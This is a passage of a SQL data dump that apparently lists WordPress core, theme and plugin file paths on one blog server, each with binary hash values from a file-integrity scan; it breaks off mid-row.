('��d�^j�fBV��k�','wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-tag-presenter.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-tag-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':l|�����x�Fs�','/6�@��\Z�?�^�Ñ!?�\'�Cc�|ܙO��$','',0,'?'),
('�����wtz���� ','wp-includes/blocks/term-description/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/term-description/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�Ƽ�]�_�k4��','���}?ʁ�,k:6gA]]�3�Os\n$�WzU�3!','',0,'?'),
('��7����d$��h��','wp-content/themes/twentytwentyfour/patterns/cta-pricing.php','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/patterns/cta-pricing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��];BQgx��','hE%0e\r�����\0�w��.��-�*5��','',0,'?'),
('��N������^�J�W��','wp-content/plugins/wordpress-seo/src/models/seo-links.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/models/seo-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4לs�&+؋r��n','n3�$C�0w\"�.d�\\�ܔVʋ+h1PG/','',0,'?'),
('��uxJ®F�y�p0�','wp-content/plugins/elementor-pro/core/app/modules/site-editor/assets/js/context/templates.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/app/modules/site-editor/assets/js/context/templates.js',0,'�U���M�_��c9�\r','�U���M�_��c9�\r','��$\n�!>�M�O<�� H����b�2��4kb�','',0,'?'),
('��َ��Z�>{�H]','wp-content/plugins/wordfence/css/main.1722265817.css','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/css/main.1722265817.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����*�8�ZM]���2','fO��͍m�D�3�MjHh�y�U�n\Zo��{','',0,'?'),
('��wp�m�T��c','wp-includes/blocks/page-list-item.php','/var/www/html/ictbank/blog/wp-includes/blocks/page-list-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E@cc�(u��<�','����+�+���W��~ł`?\\���!#e~R�','',0,'?'),
('���%h��3���Dh��','wp-content/plugins/elementor/core/base/background-process/wp-background-process.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/base/background-process/wp-background-process.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��RUJ���־�鏳','`�L���M\Z��eAR�$��͵��\n1ڰ��[:','',0,'?'),
('����d�\0Z��l��:','wp-content/plugins/elementor/assets/css/widget-heading.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/widget-heading.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �]��AqȽ���','�st\\��=�\"�>CIP+�����T �yJ��','',0,'?'),
('��<���)�\"���vY4','wp-includes/blocks/verse/style.css','/var/www/html/ictbank/blog/wp-includes/blocks/verse/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v��<_55ڬQ785','+�.�����D[�7� U�=�aI��-H\0w','',0,'?'),
('����PQ�E|E}7+','wp-admin/includes/class-wp-filesystem-ftpsockets.php','/var/www/html/ictbank/blog/wp-admin/includes/class-wp-filesystem-ftpsockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^���Պ<FԀ~��','0����c��b!�<=/���a���92os��','',0,'?'),
('�ىja��g��d��Z!�','wp-content/plugins/disable-remove-google-fonts/admin/style.css','/var/www/html/ictbank/blog/wp-content/plugins/disable-remove-google-fonts/admin/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�u�m��4a�#���d','��g���/z��롏L��ZC�C� hФJ�tp','',0,'?'),
('��U���$�\\*�1^�S�','wp-includes/js/jquery/ui/effect-clip.min.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/ui/effect-clip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S\0��j�,�ւ��C','���Y��VwK������J-u��OT{','',0,'?'),
('����P�J�t��1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!���E��P]ǡ;��','<����\0�\rIB=\"�P8D�\"�����L~�I[','',0,'?'),
('����_�� �\0*�O','wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php','/var/www/html/ictbank/blog/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2��k �Fm=�P�u8�','^��<���\Z�����C�/aa���s�|V�s:','',0,'?'),
('��B�3\r�qel�L�','wp-includes/blocks/query-no-results.php','/var/www/html/ictbank/blog/wp-includes/blocks/query-no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��^>�����\ZX�','�����O���On�l�Rb�Gx��A����','',0,'?'),
('��P\Z��/���l%�','wp-includes/js/jquery/jquery.hotkeys.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/jquery.hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��hI�QLZA$Un�H�','��T����f�RMS�9º��MDR��R��N�','',0,'?'),
('�\0� ��k~��U5T','wp-includes/widgets/class-wp-widget-text.php','/var/www/html/ictbank/blog/wp-includes/widgets/class-wp-widget-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\n�dGּk����','8Oh���+�DЮ�e���:�$ ��$�b`.�!','',0,'?'),
('�\n%f[!aE�r�tg�i','wp-includes/images/media/video.png','/var/www/html/ictbank/blog/wp-includes/images/media/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),
('�\n��Cm�Q�Uܓq��','wp-content/plugins/wordpress-seo/src/builders/indexable-social-image-trait.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/builders/indexable-social-image-trait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�������:���','�.ji�K!��rm2#�i3��N�eS� ���J�','',0,'?'),
('��Ӡ_�Q?����#','wp-content/plugins/wordfence/images/logos/shield-response.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/images/logos/shield-response.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�\nو1:/(d%܅�','�\Z�jtY�aW=x!��[�4H!|�����','',0,'?'),
('�χ���y2ř���','wp-content/plugins/wordpress-seo/js/dist/languages/pl.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/languages/pl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(`h0m�N��n���ū','�%9�y�$���ڬPj��h�o�Vj��P) �m','',0,'?'),
('�&�S짿o�$�0�n','wp-includes/author-template.php','/var/www/html/ictbank/blog/wp-includes/author-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eo\r����o���','i���\n�4��S���G\Z�H�3�Ix�Kݩ��','',0,'?'),
('�7�2���~H��-If�','wp-content/plugins/elementor-pro/modules/loop-builder/widgets/loop-grid.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/loop-builder/widgets/loop-grid.php',0,'�l��Cu)\n� �','�l��Cu)\n� �','�Ɍ��@�fTc@��I�<l�}4i.H+sg�','',0,'?'),
('�?8Rm�ТE7h��<�','wp-includes/blocks/buttons/style-rtl.css','/var/www/html/ictbank/blog/wp-includes/blocks/buttons/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\���u�*��5�2F�','�ۨ\r�W�d��� �A��! OI�Rk�D�*��','',0,'?'),
('�G�|$p֠+(�','wp-admin/js/tags-box.js','/var/www/html/ictbank/blog/wp-admin/js/tags-box.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g4i�e��ڠ�Y,׃','u,�tsn��`�b�$�D�r�FRS��r�ґ�^\"','',0,'?'),
('�Q����ԁ�2�7u�L','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg','/var/www/html/ictbank/blog/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���3y����1��',' }��N� <�v���B�S%�s\\���S�','',0,'?'),
('�R��B�p��m�Z�;','wp-includes/css/dist/block-editor/style.min.css','/var/www/html/ictbank/blog/wp-includes/css/dist/block-editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','65e��Pb�d.u�2k�','�k��JC��F�ECj��%��@�MsQ~-X','',0,'?'),
('�UA�Q�,U���q���','wp-includes/blocks/pullquote/style.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/pullquote/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ْ@�;�J�:m�','��Q�Qg�G�a�P0������9B����]H','',0,'?'),
('�q�ӣJ~F��1���O','wp-content/plugins/elementor-pro/modules/theme-builder/documents/single.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-builder/documents/single.php',0,'ț��L/����;���','ț��L/����;���','b�@-� ���R��m[o�eaP�z��0�?�r','',0,'?'),
('�r)F�ScS�I���2C','wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_1_optim.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_1_optim.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Æt�V��O��+�mF','��)-n����d��\\Go�Q� 3݁�}�2�','',0,'?'),
('�o�j����y��V','wp-content/plugins/wordfence/lib/menu_tools.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/menu_tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6ˋ�RC��[A','^�<�����E�Q�a���� e��M���~|','',0,'?'),
('��Ca�s�]��n�/��','wp-includes/css/dist/block-library/theme-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/css/dist/block-library/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�?�^�q���_\'','��=g%Y;-��3V��\Z�@,6;K�}��F\Z�0_','',0,'?'),
('���Ɩ]y��\r��h�','wp-content/plugins/elementor-pro/assets/js/loop-filter-editor.d1bae86a5ed21c0e9981.bundle.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/loop-filter-editor.d1bae86a5ed21c0e9981.bundle.js',0,'�Ǻ �\\�չEǴ�K','�Ǻ �\\�չEǴ�K','�[H#J̈́��N\Z$?uCeh�A��Ƃ��','',0,'?'),
('��0���=�o�;�','wp-content/plugins/elementor/includes/controls/groups/image-size.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/controls/groups/image-size.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�e@��T�D�V K;','\\ygs�H�����(AH�<�+����**\n','',0,'?'),
('��Ѻ�\"�P5��^U�\Zi','wp-admin/index.php','/var/www/html/ictbank/blog/wp-admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7j�R��\n��X��','C��?�c���wp�o�4m�����z �\n�X�','',0,'?'),
('��m���z4�L��K','wp-admin/images/xit.gif','/var/www/html/ictbank/blog/wp-admin/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�`��p�R��,��_�p','��A�\0|=f�����J�S<�������|','',0,'?'),
('��wF��ȶ���# �','wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e���j�-���=�\n','�W�OT�6W���[ܺ�\r�$����x���C��^','',0,'?'),
('����A�G,��<���','wp-includes/js/jquery/ui/effect-fade.min.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/ui/effect-fade.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɋ��%:�wF�5�ژ�','ND�\"x\'3,��3a���\n��V�l���E^`��\n�','',0,'?'),
('���tb���`s]\'','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/AbstractProvider.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/AbstractProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ޛ�e��Z���� @','�ڨ,��UQ�;V��]�����b�]�[��+�6','',0,'?'),
('��:\Z�`gI ��>P)','wp-includes/assets/script-loader-react-refresh-entry.php','/var/www/html/ictbank/blog/wp-includes/assets/script-loader-react-refresh-entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p��:P�p��`','n�ƿ� �UC��։�:�e���/��<��','',0,'?'),
('�ݐj��xӟ�vFP��\n','wp-includes/Requests/src/Exception/Http/Status305.php','/var/www/html/ictbank/blog/wp-includes/Requests/src/Exception/Http/Status305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���Q��6�)���',',�����<e�/�r�$����}�S','',0,'?'),
('���o���f$�΄��','wp-includes/Requests/src/Exception/Http.php','/var/www/html/ictbank/blog/wp-includes/Requests/src/Exception/Http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�8��Z�Z���͏�','�Ѐn�W�a*��!c!�E���φ�Ņ>','',0,'?'),
('����/�t�j\r�?�#','wp-includes/blocks/site-title/style.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/site-title/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+VX ��1��f�k','���1���(�\\ŵ���!K�Y�1*��1','',0,'?'),
('�����հ ̋�Ȳ�S','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(`]V�ţ[^���3','Fܑ t=Y�+�Y�ҁ��e�۾K�b�6W��','',0,'?'),
('� �n�$��q��^qf��','wp-includes/images/smilies/icon_lol.gif','/var/www/html/ictbank/blog/wp-includes/images/smilies/icon_lol.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�s\\e��|�sˎD0','��Y����a�^F_��8��ت2�3�%�j���','',0,'?'),
('�\'^�D��IG�1��!','wp-includes/ms-site.php','/var/www/html/ictbank/blog/wp-includes/ms-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�ŷ=������X�','��R��Q��\0ȭ�j24��ٻXn�^��c��','',0,'?'),
('�(���Ϲ��ز���','wp-includes/blocks/video/editor-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/video/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��NM��L�����','�y�QK��Û��JZ� �{� �v2�����2F','',0,'?'),
('�*T�u\r�����~�m','wp-admin/css/colors/ocean/colors.min.css','/var/www/html/ictbank/blog/wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r>9�����b������@','��i���a�F0(`�|h&����6=/','',0,'?'),
('�1l<� t~L�Uw�','wp-includes/class-wp-locale.php','/var/www/html/ictbank/blog/wp-includes/class-wp-locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�\"�͈�_�o[Y9�(','�����I�z��ސ�;/C�:WCN���לP','',0,'?'),
('�E-j��1j��\r�E�','wp-includes/registration-functions.php','/var/www/html/ictbank/blog/wp-includes/registration-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q<۾\Z7�M�v��','Kd���_�MF� X��X�.,\'T\\��6���6','',0,'?'),
('�Hz�t�Q����j','wp-content/plugins/wordpress-seo/js/dist/faq-block.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/faq-block.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��7�a�/���g4','��}K6�כ����,�{�>�V\'aV\0�h�J�K','',0,'?'),
('�Lu���w?���q9','wp-content/plugins/wordpress-seo/js/dist/bulk-editor.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/bulk-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f٠�|\'�Z��u(','d\\�t��\"ro��E=G����*�ՙ�]x�O','',0,'?'),
('�U�F�Vq\":��6ҍ','wp-content/plugins/elementor/assets/js/notes.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/notes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�|ʚ�ڭ3�4d\n��','|�Q7�i��B������m��\'��$�2�','',0,'?'),
('�]oM�se��J4�','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o���h5��\rxܖN','6y\Zu�υ;� �0�~�rs1J�9��X���J���','',0,'?'),
('�f ��r�p�(��p�$�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),
('���Nl0<+�ox','wp-content/plugins/wordpress-seo/src/generated/assets/plugin.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/generated/assets/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�\rT��\"����`','ݏ����&���Y���ӣ���C\0�','',0,'?'),
('�������<�x�B�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�SPZ�~����>�#�','1\n �����i����#B�\0ِ��o��lE�K','',0,'?'),
('��e�-��Rȉ���L:�','wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���z��n��z����',',�r��PQ\"q2`�C3�&\Zˀg�Z^�6','',0,'?'),
('����2�h6͒�\r�~','wp-content/plugins/wordfence/modules/login-security/classes/utility/baseconversion.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/classes/utility/baseconversion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=Q�\'��,��\09��3','|��\"�`!�Ce�l�U�t�|#o���H�$�','',0,'?'),
('�ߖj�z_���z9CC','wp-content/themes/hello-elementor/assets/js/hello-editor.min.asset.php','/var/www/html/ictbank/blog/wp-content/themes/hello-elementor/assets/js/hello-editor.min.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'f�҅�����t1w:�','�������A[<�R��Y:u�?W��}� H���','',0,'?'),
('��X�*^�ϺR���8�','wp-includes/css/dist/block-editor/default-editor-styles-rtl.css','/var/www/html/ictbank/blog/wp-includes/css/dist/block-editor/default-editor-styles-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' +�bpe�����Q5�','MnP�S�0}s�vـ Cy�O�zO���z����%','',0,'?'),
('����##Ցn\ndA\\�e','wp-includes/blocks/latest-comments/style-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/latest-comments/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����^�^%Ro�n','��^�Տ���I����H ��)���Ma','',0,'?'),
('��p?E^�@�\'��PE�','wp-admin/edit-comments.php','/var/www/html/ictbank/blog/wp-admin/edit-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' WF���\r��B��;','s\"|ڰ�y��,�o?d��aM�E\nJQ�5��/','',0,'?'),
('������U�\\��a�E','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��ͱ��r0��=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),
('�S� �X��}AV�','wp-content/plugins/elementor-pro/modules/popup/display-settings/timing.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/popup/display-settings/timing.php',0,'�/���G�*�z8�bF','�/���G�*�z8�bF',']��������ᷠ�flW��Y~���DH�&v','',0,'?'),
('��I��|>Z��q','wp-content/plugins/elementor/core/logger/log-reporter.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/logger/log-reporter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�_S,(4F���y','�T���_�Ū:��Z<�0���˝��L)�uq','',0,'?'),
('�! d����xO\r<�','wp-content/plugins/wordpress-seo/src/routes/workouts-route.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/routes/workouts-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(��%�;�a(','��� ��\r\0�h�� �^�&�iQ�p9\n','',0,'?'),
('�B����!��vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����]�b�yc~��Kw','�����\Z�T�Di.�qs�ն� �B��`-p�nN','',0,'?'),
('�\'&o�Sw6�����(�','wp-content/plugins/wordpress-seo/src/builders/indexable-home-page-builder.php','